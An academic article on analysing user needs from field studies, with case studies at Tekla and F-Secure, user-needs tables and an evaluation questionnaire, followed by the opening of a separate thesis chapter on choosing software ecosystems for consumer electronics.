The idea of producing and consolidating the contextual work models is to gain an understanding of the context of use, or the underlying structure of the work. However, the tasks are complicated and time-demanding in product development contexts. On the other hand, the cleverness of Contextual Design is that designing the user interface and its details is delayed as long as possible, and it encourages thorough design change that goes beyond user interface changes (Spinuzzi, 2000). As Holtzblatt and Beyer (1993) put it themselves: ‘We could use prototypes, mockups, or sketches to represent system structure. But we find they focus the team on the user interface. They hide the structure of the system behind user interface details, making it easier to talk about menus, icons, work choice, and screen layout than about whether the structure and organisation are right.’
In Contextual Design, the goal is to redesign the underlying structure of work rather than the artefact. In fact, this is reminiscent of the focus of the task analysis approach. For example, Kirwan and Ainsworth (1993) state that task analysis is the name given to any process that identifies and examines the tasks that must be performed by users when they interact with systems. Jeffries (1997) states that the analyst’s goal is to understand the tasks well enough to enumerate their steps and choice points, and to constrain the set of task variations to something that is cognitively manageable but also covers the critical functions that the software will support. Jeffries (1997) does not describe such a conscious goal of redesigning tasks, but the typical result of a task analysis is a list of all the tasks people do in this domain. In addition, he gives a list of ways in which task analysis can be useful in a software project, such as identifying the task to be performed by the system and redundant work that can be minimised.
As Diaper (2001) points out, an outstanding methodological issue for task analysis in general is how to analyse information derived using requirements capture techniques. Furthermore, the task analysis processes described are too difficult to use within the tight time scales of product development contexts. For example, Diaper argues that, as a method, TAKD (Task Analysis for Knowledge Descriptions) is too complicated to use for task analyses of any size without software support.
In summary, it is generally agreed that the goal of user involvement is to understand the context of use and user needs. Better user requirements and user interfaces can then be defined on the basis of that information. Field studies appear to be a promising approach to understanding user needs. However, analysing and structuring user needs in product development contexts has been shown to be difficult.
5. Research method
Early user involvement was investigated in real product-development contexts by means of case studies in order to understand the conditions of user involvement in natural product-development settings. This study adopts a multiple-case research design strategy (Dubé and Paré, 2003; Yin, 1994). Multiple case studies were performed to understand the influence of variability in context and to gain more general research results than single cases allow (Yin, 1994). First, a cross-case analysis of the first seven case studies was used to develop a process of early user involvement to support the analysis and utilisation of user needs in product development. Second, two case studies were performed to test the developed early user-involvement process. All nine case studies were performed as part of three research projects carried out between 1998 and 2005. The studies were based on real product-development cases in six industrial partner companies in Finland. The cases represent diverse applications and companies, which enhances the generalisability of the results (Eisenhardt, 1989).
The first seven studies were individual case studies in which within-case analysis was used (cf. Eisenhardt, 1989). Most of the case studies have been published, and the results are summarised in Kujala (2002). The goal was to evaluate the costs and benefits of the field study approach. As shown in Table 1, several data-gathering methods were used in order to increase the internal validity of the results (Dubé and Paré, 2003). It was found that the field study approach is useful even in a short time frame and incurs relatively low costs. For example, usability was improved and customer satisfaction was increased. The number of involved users varied from three to thirteen. As mentioned earlier, field studies are qualitative in nature, and the goal is to understand the needs of the users in depth rather than to cover a large sample of users. The rationale for selecting representative users is described in Kujala and Kauppinen (2004). As Eisenhardt (1989) points out, within-case analysis gives investigators a rich familiarity with each case, which, in turn, accelerates cross-case comparison. Here, the cross-case analysis was used to identify a process of early user involvement in order to support the analysis and utilisation of user needs in product development. The goal of the last two case studies was to test the analysis process in real product-development contexts. The results were analysed in two stages (Eisenhardt, 1989). Within-case analysis was performed first to provide the researchers with a rich understanding of each case. Second, a cross-case analysis was performed to identify the similarities and differences between the cases.
6. Cases: Process of analysing user needs
The first seven case studies are summarised in Table 1. The research questions varied as the research work went on and new problems and solutions were identified. Table 1 summarises the lessons learned concerning the analysis and utilisation of user needs. In the first two case studies, reported by Kujala and Määttä (2000a, b), the goal was to describe the results of field studies rather than analyse them. The work models of Holtzblatt and Beyer (1993) were taken as the starting point for describing the current situation. However, it was recognised that the work models were too complicated to use cost-effectively, and thus only a simple picture of the current context of use was produced. After that, the design work quickly turned to describing the use hierarchies of the future product, as the task sequence was identified as important in defining the new product. In addition, the problems of users were found to be very useful in identifying new product features.
Table 1. Summary of case studies.
In the last five case studies, three of them reported in Kujala et al. (2001b), the field studies were introduced and performed in real product-development contexts and by real developers. It became evident that a clearer and more cost-effective process for analysing the results was needed. In the case study reported by Kujala et al. (2001a), the person hours used in performing the field study were carefully calculated, and it was found that analysing and reporting was the most time-consuming phase: 23% of the time was spent gathering data and 77% analysing and reporting. In addition, the team members found this a particularly demanding phase. In the following studies, user-needs tables were developed to bridge the gap between informal user needs and more formal requirements. In addition, we started to work on the process of analysis, making it explicit enough to be taught and used effectively.
Based on these case studies, we identified six main steps of early user involvement for identifying user needs and analysing them:
1. Identify stakeholders and user groups
First, the most important stakeholders and user groups need to be identified and described so as to make it possible to reach representative customers and users by means of field studies. We have discussed the identification of users in Kujala and Kauppinen (2004).
2. Visit users and explore their needs
Users are visited in their own environment in order to gather real information about their needs.
3. Describe the current situation
The first step in analysing the results of the field study is to describe the current situation. By the current situation, we mean the context of use and particularly the task sequence. In our case studies, we used a simple figure, a task hierarchy, a scenario, and user-needs tables to describe the current situation.
4. Analyse and prioritise the problems and possibilities
In order to utilise the information gathered in product development, the user needs associated with the future product are identified. In the case studies, it became clear that understanding the problems of the users was key to developing new products for them and that, once the problems were analysed, it was easy to develop new products to correct those problems and support users in their tasks. Thus, we argue that user needs manifest themselves either as problems that hinder users in achieving their goals, or as opportunities to improve the likelihood of users achieving their goals. Not all the problems and possibilities are clearly stated by users; the positive and negative aspects of the context of use and the present tasks and tools need to be analysed and identified. The negative aspects may be labour-intensive or complicated task steps or sequences, task details that are difficult to remember or complete, or task steps performed using traditional methods such as paper and pencil. The positive aspects are those which users value and are not willing to change. Finally, there may be too many user needs for one product to meet, and thus the identified user needs have to be categorised and prioritised.
In categorising needs, we have used a process similar to that which Bruseberg and McDonagh-Philp (2001) used for the initial data analysis of the aspirations that users stated in focus groups. Bruseberg and McDonagh found that making notes of essential issues and comments made by users can be more effective than producing lengthy verbatim notes. They classified similar, repeatedly mentioned topics into categories and substantiated the weight of the categories by giving them a ‘tick’ each time a related thought was mentioned. In our case studies, we have had similar experiences; developers are not willing or able to utilise verbatim descriptions, and we developed user-needs tables to summarise and structure the findings.
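The tick-based weighting described above amounts to tallying how often each category of comment recurs across users. A minimal sketch in Python illustrates the idea; the category names and comments are invented for illustration and are not taken from the case studies.

```python
from collections import Counter

# Hypothetical coded field-study notes: each entry is the issue category an
# analyst assigned to one user comment during a visit.
coded_comments = [
    "manual re-entry of data", "unclear error messages",
    "manual re-entry of data", "slow report generation",
    "manual re-entry of data", "unclear error messages",
]

# One 'tick' per related comment substantiates the weight of each category.
tally = Counter(coded_comments)
for category, ticks in tally.most_common():
    print(f"{category}: {ticks}")
```

Sorting by tick count gives a first, rough prioritisation of the needs before the more careful analysis of problems and possibilities.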
Although we identified the problems of the users as essential links to product development, it was not always easy to utilise the information in development work. There was often an overwhelming number of problems, and technically oriented developers had problems processing the written descriptions. We realised that developers needed a slightly more formal way of representing user needs so that they could process the information step by step. Thus, we combined the two most essential representations of the context of use - a task sequence and user problems and possibilities - in user-needs tables. In other words, user-needs tables represent user needs as users’ problems and possibilities and link them to a task sequence. Several kinds of user information can be summarised in the form of user problems and possibilities. Problems are obstacles that arise from users’ characteristics, their physical and social environment, and the overall situation. Possibilities represent users’ more implicit needs and suggest how users’ tasks can be supported and improved. As the information is in a structured form, it can be used step by step in redesigning the current situation.
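The structure of a user-needs table can be sketched as a simple data model: each row links one task step to its observed problems and possibilities. This is an illustrative sketch only; the field names and example content are assumptions, not the actual tables used in the cases.

```python
from dataclasses import dataclass, field

@dataclass
class UserNeedsRow:
    """One row of a user-needs table: a task step in the current task
    sequence, linked to observed problems (obstacles) and possibilities
    (implicit needs)."""
    task_step: str
    problems: list = field(default_factory=list)
    possibilities: list = field(default_factory=list)

# Invented example rows, not data from the case studies.
user_needs_table = [
    UserNeedsRow(
        task_step="Collect measurement data on site",
        problems=["data recorded on paper and re-entered later"],
        possibilities=["record data directly into the system"],
    ),
    UserNeedsRow(
        task_step="Check results against reference values",
        problems=["reference values looked up from a separate manual"],
    ),
]

# Developers can walk through the needs step by step, in task order.
for row in user_needs_table:
    print(f"{row.task_step}: {len(row.problems)} problem(s)")
```

Keeping the rows in task-sequence order is what lets developers process the needs step by step rather than facing an unstructured list of problems.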
5. Redesign the current situation
The first step in utilising user needs and defining user requirements is redesigning the current situation and deciding the role of the product in the context of use. The values of users need to be identified so that it is possible to decide how to add value for them in the future product. It is essential to identify the focus of the product and the scope of the tasks to be supported. Furthermore, the identified problems should be corrected and users’ task sequences streamlined; for example, unnecessary steps are eliminated. However, it is important to keep the existing task logic, as it supports users in performing their tasks. We have used use cases for describing the redesigned current situation, but use scenarios, storyboards, use workflows, or use flow diagrams could also be used (Hackos and Redish, 1998).
6. Define user requirements
In addition to redesigning the current situation, specific user requirements were also needed.
7. Cases: Testing the analysis process
The goal of the case studies was to test the analysis process in real product-development contexts. The cases and the results of the within-case analyses are described first, and then the comparison of the cases is presented.
7.1 Case 1
The first study was performed in Tekla, a medium-sized company producing software products for managing infrastructures. The main product, Tekla Structures, is a complex system for experts in structural engineering and it includes an extensive number of functions. The complexity of Tekla Structures is demonstrated by the fact that there are 220 commands on the first menu level, and, in addition, there are dozens of commands on successive menu levels.
The goal of the case study was to gather user needs for the redevelopment of a functionality of Tekla Structures. The product had been developed over the years according to customer feedback. Most of the corrections were rather small fixes. Now, a larger piece of functionality was identified as being difficult for the customers, according to the feedback received by area offices abroad. This functionality was selected for improvement, but the needs of the users were not well enough known and more information was needed from them.
Field studies
The field study was performed by a team of two usability experts, a user interface designer, and a researcher. The researcher’s role was that of an expert or a consultant who provided information, brief training, and support for the practitioners. In addition, a requirements engineering team of a requirements engineer, a usability expert, and a researcher participated in planning the field study and analysing the results.
In the beginning, existing information was gathered inside the company, for example from service. This information helped to focus the user interviews and was also of use in the selection of questions. Then, four users representing three customers were interviewed in order to ascertain user needs for the product and to gather feedback on the previous version of the product. One person conducted the interviews and another took notes. In addition, the interviews were audio recorded.
Analysing the results of the field studies
All three customers had developed their own strategy for handling the task and the problems associated with it. The strategy was rather similar in all of them, even though the product did not introduce or support it. A number of user problems associated with the current task sequence were identified. It was realised that many of these problems would disappear when the functionality and user interface were changed. However, it was important to identify the essential task steps, phases, and problems so that design work could be based on user needs. Thus, we decided to take a higher-level view of the current task sequences and problems, which was described in a user-needs table (see Table 2).
<table>
<thead>
<tr>
<th>Step</th>
<th>Problems</th>
<th>Possible solution</th>
</tr>
</thead>
<tbody>
<tr>
<td>1. User creates a seed project (a project containing default environment and company settings).</td>
<td>Currently the seed project is a complicated many-level folder structure containing a complete set of Tekla Structures files, only the model excluded.</td>
<td>File/New opens dialog asking whether user wants to create 1) new seed project, 2) new model with seed project as template….</td>
</tr>
<tr>
<td>2. User saves a seed project.</td>
<td></td>
<td>Name/path asked, automatic save</td>
</tr>
</tbody>
</table>
Table 2. Example of the kind of user-needs table developed.
In addition to the original task sequence (Step column) and the problems and possibilities (Problems column), the requirements engineer added a possible-solution column to describe initial solution ideas. This column was useful for getting an idea of how the problems could be solved in the new version of the product. After that, the high-level task sequence described in the user-needs table was redesigned and the new task sequence was described in a use case (see Table 3). The requirements engineer used that table as a starting point and continued to define user requirements. The requirements engineering group also used user-needs tables for gathering feedback both from inside the company and from users. The final requirements specification described the user problems and requirements on different levels: the current context of use, problems in the current user interface, requirements gathered inside the house by means of a requirements management tool, users' comments, use cases, a navigation map, and pictures of the new user interface.
<table>
<thead>
<tr>
<th>Step</th>
<th>User input</th>
<th>Program action</th>
<th>Note/ question</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>User indicates that he wants to save the model as a model template.</td>
<td>Tekla Structures asks the user to enter a name and location for the new model template.</td>
<td>Note: File->Save as…</td>
</tr>
<tr>
<td>2.</td>
<td>User enters name and location.</td>
<td>Tekla Structures saves the model as a model template to this location.</td>
<td></td>
</tr>
</tbody>
</table>
Table 3. Example of the use case developed.
Evaluating the analysis process
The analysis process was evaluated by interviews and a questionnaire. The persons who were working on the project were asked to fill in the questionnaire, and three of them, the requirements engineer and two developers, were also interviewed. Seven persons filled in the questionnaire: two from software production, two from the usability group, one from user documentation, one from product management, and the requirements engineer who was responsible for writing the specification. Together, the respondents represented software production, the usability group, user documentation, service, product management, and release management. The questionnaire used is in Appendix A. First, the respondents were asked to evaluate the requirements quality in the developed specification; then they were asked to evaluate the usefulness of the descriptions used; finally, they were asked to evaluate the general requirements quality in Tekla. The requirements team found the analysis process and the piloted descriptions useful; the descriptions supported analysing in stages and parsing a large amount of information. The different description methods complemented each other in the step-by-step analysis, and all the steps were important and had their own roles. In addition, documenting the essential issues helped in structuring and analysing the large amount of information gathered from users. The other respondents also found all the descriptions useful, except the requirements gathered by the requirements management tool. The reason may be that these requirements were preliminary and inconsistent, as they were written by different people. However, the views expressed towards the descriptions seemed to depend on the role of the respondent. In particular, technical developers were most interested in the user interface pictures and the navigation map. They said that they would like to have all the background information available in a separate document. Another solution would be to have several views incorporated in the same document.
Furthermore, the quality of the requirements was evaluated as being better in the pilot project than in Tekla in general, as shown in Figure 3. One person declined to evaluate the general quality, as she was a rather new employee of Tekla, and her evaluation was thus excluded from Figure 3. In summary, one of the five respondents evaluated the quality as being slightly lower in the pilot project than in general, and the other four evaluated the quality as being better in the pilot project.
Figure 3. Evaluated requirements quality in the pilot project and the company in general (Mean value of the quality statements, 1=strongly disagree, 4=strongly agree).
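The mean values plotted in Figure 3 are simple averages of the 1-4 agreement scores over the quality statements. A minimal sketch, using hypothetical responses rather than the study's actual data, where `None` stands for a "don't know" answer:

```python
def mean_quality(scores):
    """Mean of 1-4 agreement scores; None ("don't know") answers are skipped."""
    valid = [s for s in scores if s is not None]
    return sum(valid) / len(valid)

# Hypothetical answers of one respondent to the twelve quality statements
pilot_answers = [3, 4, 3, None, 4, 3, 4, 3, 4, 3, 3, 2]
print(round(mean_quality(pilot_answers), 2))  # 3.27
```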
Figure 4 shows how the different requirements quality issues were evaluated and it is possible to see how the pilot project differs. The specification of the pilot project was seen as being more successful, complete, and understandable than specifications in general. In addition, the respondents evaluated the specifications as being based on information gained from users and customers.

7.2 Case 2
The second study was performed in F-Secure, a medium-sized company producing software security products. The goal of the study was to pilot field studies in one project, in which a new product was being developed for a new customer group. As the target customer group was new and relatively unknown, the idea was to validate the product idea, understand hidden user needs, and gather user requirements. Unlike the product in Case 1, the application was not used on a daily basis; rather, it can be characterised as working in the background on a user's computer.
Field studies
First, the user study team consisted of a project manager, a chief architect, and a researcher. The researcher's role was that of an expert or a consultant who provided information, brief training, and support for the practitioners. The chief architect interviewed three users together with the researcher. The results showed that the user needs depended on the customer type and their risk level. The business owner of the new product then became involved, and she decided that more information was needed from users. This time, the user study team consisted of the business owner, a user interface designer, a documentation team manager, and a researcher. The team interviewed 14 more users over a period of one month.
Analysing the results of field studies
The time schedule was very tight; there was no time for further analysis of the results of the first three interviews and only short notes were produced. After the rest of the interviews, the results were gathered onto 18 slides. In addition, the researcher produced a user-needs table describing the results. In this case, the description of the two main customer groups and the values of the users were identified as being the most essential results. It was found that the customers consisted of two distinctive groups that had different motives and needs for the product.
Evaluating the analysis process
In this case, the analysis process was much less thorough. Short notes were written for each interview, and short textual descriptions of the current context of use were pulled together from the individual notes. As the product was intended to work mostly in the background on the computer, and it resembled a service rather than a software product, redesigning the task sequence was not as essential as in Case 1. Thus, the analysis focused on describing the present context of use for evaluating the new product concept. However, as the users' skill level was notably lower than expected and they valued different things than expected, the business owner evaluated the field study results as having a significant effect on the scope of the product.
7.3 Comparison of Case 1 and Case 2
The results of Case 1 and Case 2 are summarised in Table 4. The two cases represented diverse categories of applications, and the results were accordingly different. Case 1 was in line with our earlier case studies, showing the validity of the earlier findings and of the developed process of early user involvement. It showed that the process helped in structuring and analysing the large amount of information and led from user needs to requirements. As a result, the requirements were evaluated as being more successful and their quality was better than average. In Case 2, the results of the field study were found useful, but the user-needs analysis part of the process was not used. The main reason was that the application did not involve enough user tasks to be described and redesigned. In this case, the benefit of the field studies was derived more from understanding user motivation and values, which enabled the correct product concept to be defined from the user point of view.
These two cases demonstrate how different applications and their development can be. No single user-involvement process fits every case. Case 1 showed the proposed process of early user involvement to be useful. Case 2 revealed that the prerequisite is that the application supports users’ tasks that can be identified. Furthermore, Case 2 showed that informed redesign of user tasks is only one aspect of the benefits of the field studies and understanding user motivation is an essential benefit, too.
8. Conclusions
In this article, we have discussed the role of user involvement in product development. Our suggestion is that the most natural and promising form of user involvement in product development is informative and empowered. This means that even if products are developed for a wide audience of users (cf. Tuunanen, 2003) and they may not be motivated to play an active role in product development, it is essential for product developers to be active in gathering information and feedback directly from representative users and understanding their needs and values. Users should not be passive informants as, in spite of the good intentions of the developers, they have different values concerning products and their use.
The most significant user involvement occurs at the beginning of product development, when it is being decided what the product will be like and how it is going to support users. It is essential that product development is grounded on user needs interwoven with the context of use. Field studies appear to be a promising approach to early user involvement, but they are found to be demanding and are not widely used in practice. One of the critical concerns in making field studies effective is how to analyse user needs and discover issues that are relevant from the product-development point of view. This article presents a process of early user involvement that describes how user needs can be analysed and utilised in product development. The process was developed on the basis of the experience gained from seven case studies.
Table 4. Summary of the results of Case 1 and Case 2.
<table>
<thead>
<tr>
<th>Case</th>
<th>Research question</th>
<th>Application</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td>I</td>
<td>How can field study results be analysed and translated into user requirements?</td>
<td>Building modelling software package</td>
<td>The analysis process helped in structuring and analysing the large amount of information. The resulting requirements were evaluated as being more successful and their quality was better than average.</td>
</tr>
<tr>
<td>II</td>
<td>How can field study results be analysed and translated into user requirements?</td>
<td>Software security product</td>
<td>The analysis of user tasks was unnecessary as the phase of development was very early and the product is working in the background on a user’s computer. Thus, identifying the context of use and user values were evaluated to be more important than analysing task sequence.</td>
</tr>
</tbody>
</table>
On the other hand, the process was not used in Case 2. As can be expected, no single user-involvement process fits the development of varied applications in varied contexts. Case 2 demonstrates that the prerequisite for using the proposed process is that the application supports users' tasks that can be identified. Furthermore, it shows that informed redesign of user tasks is only one aspect of the benefits of field studies; understanding user motivation can be even more essential. It can be argued that, if the product idea does not involve user values and motivations, it is not acceptable at all, and the redesigned task sequence is not useful either. On the other hand, understanding user values and motivations and understanding the task sequence are not mutually exclusive; rather, early user involvement supports both. For example, according to our experience, the details of the task sequence are often very meaningful to users, and problems in the task sequence can be annoying to them. Thus, the process of early user involvement needs to be adapted on the basis of the application type and the development situation. Furthermore, the presented analysis process is initial and simplified. For example, including collaboration and multitasking would bring a new dimension to the analysis that is not considered here (see Pinelle et al., 2003). However, the goal of the process presented is not to be broad and extensive but to cover the most essential analysis steps for tightly scheduled product development projects. Thus, the process of early user involvement needs to be simple enough to be practical in product development.
The results of the case studies suggest some explanations of the mechanisms of early user involvement in product development. First, users can provide information about the context of use that has an effect on the use of the future product. Second, providing information is not the only mechanism: placing developers near users increases their understanding of the users' values and attitudes. This interpretation is also supported by the earlier observations of Olsson (2004). In addition, Kujala and Mäntylä (2000a) interviewed developers who happened to be users themselves and found that the developers incorrectly expect ordinary users to have patterns of behaviour and values similar to their own. However, understanding users' needs and values is only the first step in user involvement, and user-centred development is iterative in nature. As soon as a new product is sketched, it creates new user needs and requirements, as the task-artifact cycle predicts (Carroll and Rosson, 1992).
The importance of understanding context of use is already widely recognized and is recommended by ISO 13407 (1999) and Gulliksen et al. (2003). However, in order to make the utilization of the context of use information possible, the links to development work need to be elaborated. The results of the case studies suggest some ways of utilizing the context of use information. In particular, present task sequence, problems, and possibilities are shown to have direct consequences for user requirements and finally for product quality. In addition, the popularity of different forms of scenarios demonstrates that task sequences and the context of use related to it are widely recognized as useful in system development (see, for example, Carroll and Rosson, 1992; Alexander and Maiden, 2004; Redish and Wixon, 2003). Certainly, different ways of describing task sequences can be useful and valid in analysing user needs. The user-needs table is one of the possible means of presentation; its strength lies in its summary of the context of use in one table in a structured way. Task scenarios that are narrative descriptions of a user performing a task would include the same information, but they are not so straightforward to use in development work. In addition, as Carroll and Rosson (1992) point out, there is an infinity of possible use-scenarios. A user-needs table structures the information so that it can be handled step by step and so the problems and possibilities highlight clearly where the current situation could be improved by a new system.
Overall, this article introduces an initial step towards understanding early user involvement in product development and how to improve its effectiveness. The article provides a process of identifying, analysing, and utilising user needs based on broad experiences from several industrial cases. Furthermore, it analyses a potential mechanism of user involvement.
Appendix A: The evaluation questionnaire
Tekla pilot project questionnaire 2005
This questionnaire is designed to gather experiences from the pilot project for Tekla product development purposes. Specification and requirements refer here to the pilot project start up “Specification of Feature” document. The questionnaire is a part of the CORE research project: http://www.soberit.hut.fi/core/english/index.html
All the information you provide will be kept confidential. The resulting report will present information in aggregate form and such information will be anonymous and unattributable to individual respondents.
The quality of the specification
Please indicate the strength of your agreement/disagreement with the following statements concerning the quality of pilot project specification.
1 = strongly disagree, 2 = disagree, 3 = agree, 4 = strongly agree, 5 = no opinion, don't know
<table>
<thead>
<tr>
<th>Statement</th>
<th>Disagree</th>
<th>Agree</th>
<th>Don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>I consider the specification a success.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Customer or user requirements are completely defined.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>All the essential issues from the customer and user point of view are documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The document describes functions that meet the user needs.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The customer and user processes that the system is designed to support are analyzed and documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are understandable for those who are not part of the project.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are described using language that a technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are described using language that a non-technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are based on the information gained from users or customers.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>In all likelihood, there are moderately few errors in the requirements.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The correctness of the requirements is checked with real users.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>There were many differences in the views of the parties in requirements engineering.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
The analysis of requirements
The requirements were analyzed and described using several methods; please indicate how useful you consider each of them.
<table>
<thead>
<tr>
<th></th>
<th>Useless (1)</th>
<th>(2)</th>
<th>(3)</th>
<th>Useful (4)</th>
<th>Don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>Current situation tables</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Problems in current user interface pictures</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Requirements in Caliber</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Comments from users</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Use cases</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>Navigation map</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
<tr>
<td>User interface pictures</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>
What is good in varied descriptions?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
What is problematic in varied descriptions?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
What would you recommend? How should requirements be analyzed and described in Tekla?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
Other comments:
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
The average quality of the specifications in Tekla
Please indicate the strength of your agreement/disagreement with the following statements concerning the average quality of the specifications in Tekla.
1 = strongly disagree, 2 = disagree, 3 = agree, 4 = strongly agree, 5 = no opinion, don't know
<table>
<thead>
<tr>
<th>Statement</th>
<th>Disagree</th>
<th>Agree</th>
<th>Don't know</th>
</tr>
</thead>
<tbody>
<tr>
<td>I consider the specification a success.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Customer or user requirements are completely defined.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>All the essential issues from the customer and user point of view are documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The document describes functions that meet the user needs.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The customer and user processes that the system is designed to support are analyzed and documented.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are understandable for those who are not part of the project.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are described using language that a technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are described using language that a non-technical person understands.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The requirements are based on the information gained from users or customers.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>In all likelihood, there are moderately few errors in the requirements.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>The correctness of the requirements is checked with real users.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
<tr>
<td>There were many differences in the views of the parties in requirements engineering.</td>
<td>1 2 3 4</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Thank you very much!
Chapter 3. Consumer Electronics Software Ecosystems
This chapter is an extended version of the article which is published as:
Abstract
Due to the increasing size of software, and because consumer electronics products are increasingly connected to the internet, many consumer electronics firms are adopting an ecosystem-centric approach to supporting 3rd party applications. In a mature market where successful platforms are available, a firm will mostly choose an existing platform. In an emerging market, a consumer electronics firm may need to create a new ecosystem or adopt a newly developed platform, both of which have significant commercial and technical implications.
In this paper we identify three types of ecosystems that are used today: vertically integrated hardware/software platforms, closed source software platforms, and open source software platforms. We introduce a first step towards a multi-criteria decision support method. This method determines which of the three types of ecosystem is most likely to become successful for a specific product category. The method is based on the scope and technology design of the platform and takes a software engineering perspective.
We use this method to analyze a wide range of consumer electronics products. We show that the vertically integrated platform type is most suitable for products with a high degree of innovation and that open source software platforms are more suitable when a large number of variants is needed to serve the market. The closed source software platform type is less suitable for consumer electronics, especially for products which require optimal use of system resources and have a large degree of innovation.
Consumer electronics manufacturers can use this method to select the ecosystems type that they want to adopt or create. Firms that create software platforms can use this method to select the product types they want to target.
3.1 Introduction
Consumer electronics products have radically changed over the past two decades. Initially the functionality of these products, including products such as CD and DVD players, televisions and radios, was mainly implemented through hardware. Due to the reduced costs
for integrated circuits (ICs) and the increased capabilities of these ICs, more and more of the functionality is now implemented through software [Hartmann 2012]. Furthermore, many products are now connected to the internet and support the downloading of applications in addition to the applications that are embedded in the devices.
Initially the products were entirely developed by individual firms, but nowadays 3rd parties are used for the development of software components. Specifically for downloadable applications, it is not feasible for an individual company to develop these applications itself. As a result, many firms are adopting an ecosystem-centric approach in which 3rd parties are supported to develop applications for their products.
In a mature market where there are existing ecosystems, a consumer electronics firm will usually choose an existing platform, and this choice is largely determined by commercial aspects, e.g. the number of 3rd party applications and the license fees, and functional requirements, e.g. whether the platform supports the specific features that the firm wants to offer. In an emerging market, i.e. when there are no existing or no dominant ecosystems, a consumer electronics firm may decide to create a new ecosystem, and software vendors may decide to create software platforms to serve this market. As an example, consider the smart phone market. Nowadays there are a few dominant ecosystems, and manufacturers of devices usually choose an existing platform, typically Android, Windows or Tizen. In the early years new ecosystems were created by consumer electronics firms such as Nokia, BlackBerry and Apple, and software platform vendors entered the market, e.g. Microsoft and Google. Some of these ecosystems became successful while others disappeared after a few years.
The adoption of an ecosystem has significant implications, both commercially and technically. For instance, if a company decides to open its own platform for 3rd parties, it has to attract sufficient parties and it has to maintain its own ecosystem. When a company decides to adopt an existing software platform, changes are required to the architecture and a significant part of the revenues may go to the platform owner. Furthermore, it has to be confident that the adopted ecosystem will become successful. The success of an ecosystem relies on many aspects, which include the scope and design of the platform, how the platform owner co-operates with the complementors, how each of the participants is able to obtain revenues, how the sales channels are organized and how the platform is able to deal with changing requirements [Popp 2010, Gawer 2008, Axelsson 2014].
In this paper we classify the types of ecosystems that are used for consumer electronics and identify the strengths and challenges of each type, thus serving as a reference for emerging markets. Furthermore, we analyze, given the requirements from the market, which of the identified types is likely to become successful for a specific type of product from a software engineering perspective.
This paper answers the following research questions:
- What types of ecosystems are used in consumer electronics products to support 3rd party applications?
- Which of the ecosystem types is most suitable for a specific product category from a software engineering perspective?
To answer the first question a variety of consumer electronics domains are studied, resulting in a taxonomy. To answer the second research question, we introduce a multi-criteria decision support method [Gella 2006]. The decision support method analyzes the scope and technology design of a software platform [Gawer 2002] with respect to its ability to meet the functional and non-functional requirements.
Our method finds its origin in methods for selecting software components and software vendors [Nazir 2014, Alpar 1998] and similarly uses multiple criteria that are based on expert opinion and use ordinal scales [Cooper 2011]. The criteria to evaluate types of ecosystems are general market requirements [Bolwijn 1990, Sheat 2010], requirements from the nature of consumer electronics devices [Henzinger 2006, Trew 2011], and requirements from the use of ecosystems [Messerschmitt 2004, Bosch 2010, Underseth 2007]. For each type of ecosystem we identify the strengths and challenges from a software engineering perspective. The decision support method is based on comparing the requirements for a product type with the strengths and challenges of the ecosystem types.
Since our decision support method does not cover commercial and organizational aspects, we do not claim that it is complete; it is therefore a first step towards a full-fledged decision support method.
